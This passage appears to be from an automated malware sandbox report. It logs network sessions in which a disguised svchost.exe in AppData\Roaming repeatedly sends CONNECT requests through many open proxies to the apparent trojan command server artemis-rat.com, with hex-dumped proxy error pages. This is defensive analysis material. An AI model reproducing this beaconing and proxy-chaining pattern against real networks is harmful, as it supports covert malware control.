4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2333	192.168.2.5	57346	39.108.229.14	8002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.845618963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.178268909 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2334	192.168.2.5	57350	120.76.42.209	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.845710993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.187747955 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2335	192.168.2.5	57354	120.77.148.138	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.845868111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.186290979 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2336	192.168.2.5	57593	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.846159935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2337	192.168.2.5	57428	37.187.91.192	21981	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.846261978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.645726919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646212101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.646228075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2338	192.168.2.5	57510	201.174.239.28	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.846262932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.380331039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2339	192.168.2.5	57418	198.44.255.3	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.846318007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2340	192.168.2.5	57398	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.846371889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2341	192.168.2.5	57579	172.67.253.69	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.846832037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.001451015 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2342	192.168.2.5	57414	41.111.243.18	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.847141981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.160728931 CET	495	IN	HTTP/1.1 502 Proxy Error Date: Sat, 09 Mar 2024 12:13:39 GMT Server: Apache Content-Length: 348 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2343	192.168.2.5	57352	185.158.114.14	25697	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.847419977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2344	192.168.2.5	57431	45.138.87.238	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.863157988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2345	192.168.2.5	56573	51.15.252.246	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.863753080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.657879114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2346	192.168.2.5	57382	94.20.183.172	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.875725985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.250473976 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2347	192.168.2.5	57638	104.21.102.95	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.876518011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.030936003 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2348	192.168.2.5	56510	37.187.77.58	13412	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.877517939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974210978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.177565098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2349	192.168.2.5	57445	45.120.178.197	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
